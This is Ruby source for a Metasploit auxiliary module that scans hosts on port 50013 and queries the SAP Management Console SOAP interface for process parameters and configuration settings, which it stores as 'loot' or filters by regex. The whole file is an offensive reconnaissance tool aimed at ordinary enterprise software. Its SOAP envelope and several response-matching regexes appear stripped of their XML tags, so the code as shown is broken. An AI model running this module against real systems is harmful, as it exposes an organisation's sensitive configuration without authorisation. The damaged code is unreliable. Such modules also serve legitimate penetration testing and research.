## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'SAP Management Console Get Process Parameters', 'Description' => %q{ This module simply attempts to output a SAP process parameters and configuration settings through the SAP Management Console SOAP Interface. }, 'References' => [ # General [ 'URL', 'http://blog.c22.cc' ] ], 'Author' => [ 'Chris John Riley' ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(50013), OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('MATCH', [false, 'Display matches e.g login/', '']), ], self.class) register_autofilter_ports([ 50013 ]) deregister_options('RHOST') end def rport datastore['RPORT'] end def run_host(ip) res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'GET' }, 25) if not res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end getprocparam(ip) end def getprocparam(rhost) print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' xsi = 'http://www.w3.org/2001/XMLSchema-instance' xs = 'http://www.w3.org/2001/XMLSchema' sapsess = 'http://www.sap.com/webas/630/soap/features/session/' ns1 = 'ns1:GetProcessParameter' data = '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << 'true' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '' + "\r\n" data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + "\r\n" data << '' + "\r\n" data << '' + "\r\n\r\n" begin res = send_request_raw({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Length' => data.length, 'SOAPAction' => '""', 'Content-Type' => 'text/xml; charset=UTF-8', } }, 30) if not res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end if res.code == 200 case res.body when nil # Nothing when /(.*)<\/parameter>/i body = [] body = res.body success = true end elsif res.code == 500 case res.body when /(.*)<\/faultstring>/i faultcode = $1.strip fault = true end else print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.") end rescue ::Rex::ConnectionError print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication") return end if success #Only stoor loot if MATCH is not selected if datastore['MATCH'].empty? print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") store_loot( "sap.getprocessparameters", "text/xml", rhost, res.body, ".xml" ) else name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) print_status("[SAP] Regex match selected, skipping loot storage") print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}") saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, 'Header' => "[SAP] Process Parameters", 'Prefix' => "\n", 'Indent' => 1, 'Columns' => [ "Name", "Description", "Value" ]) xmldata = REXML::Document.new(body) xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/' xmlpath << '/SAPControl:GetProcessParameterResponse' xmlpath << '/parameter/item' xmldata.elements.each(xmlpath) do | ele | if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/) name = ele.elements["name"].text if not ele.elements["name"].nil? desc = ele.elements["description"].text if not ele.elements["description"].nil? desc = '' if desc.nil? val = ele.elements["value"].text if not ele.elements["value"].nil? val = '' if val.nil? saptbl << [ name, desc, val ] end end print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty? end return elsif fault print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}") return else # Something has gone horribly wrong print_error("#{rhost}:#{rport} [SAP] failed to request environment") return end end end